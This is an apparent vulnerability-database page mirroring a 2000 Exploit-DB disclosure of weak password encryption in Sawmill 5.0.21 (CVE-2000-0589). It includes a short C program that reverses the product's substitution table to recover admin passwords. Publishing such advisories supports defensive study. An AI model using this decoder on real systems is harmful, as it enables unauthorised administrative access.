Lucene search
+L

Flowerfire Sawmill 5.0.21 - Weak Password Encryption

🗓️ 26 Jun 2000 00:00:00Reported by Larry W. CashdollarType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 26 Views

Weak password encryption in Sawmill allows attackers to decrypt admin passwords and gain access.

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2000-0589
19 Jul 200004:00
cve
Cvelist
CVE-2000-0589
19 Jul 200004:00
cvelist
EUVD
EUVD-2000-0585
7 Oct 202500:30
euvd
NVD
CVE-2000-0589
26 Jun 200004:00
nvd
Tenable Nessus
Sawmill Weak Password Encryption Scheme Information Disclosure
27 Jun 200000:00
nessus
ThreatPost
305 CVEs and Counting: Bug-Hunting Stories From a Security Engineer
2 Oct 202014:01
threatpost
// source: https://www.securityfocus.com/bid/1403/info

Sawmill is a site statistics package for Unix, Windows and Mac OS. Passwords are encrypted using a weak hash function. This combined with the file disclosure vulnerability in Sawmill (bid = 1402) could allow an attacker to read the contents of sawmill's password file, then decrypt the password and gain Sawmill administrative capabilities.

/*Decrypt password for Sawmill admin account.

Larry W. Cashdollar
[email protected]
http://vapid.betteros.org
usage ./decrypt cyphertext

*/

#include <stdio.h>



char *alpha ="abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()_+~<>?:\"{}|";
char *encode="=GeKMNQS~TfUVWXY[abcygimrs\"#$&-]FLq4.@wICH2!oEn}Z%(Ovt{z";

int
main (int argc, char **argv)
{

  int x, y;
  char cypher[128];

  strncpy (cypher, argv[1], 128);

  for (x = 0; x < strlen (cypher); x++)
    {

      for (y = 0; y < strlen (encode); y++)
        if (cypher[x] == encode[y])
          printf ("%c", alpha[y]);

    }

printf("\n\"+\" could also be a space [ ]\n");

}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Jul 2012 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 27.5
EPSS0.03668
26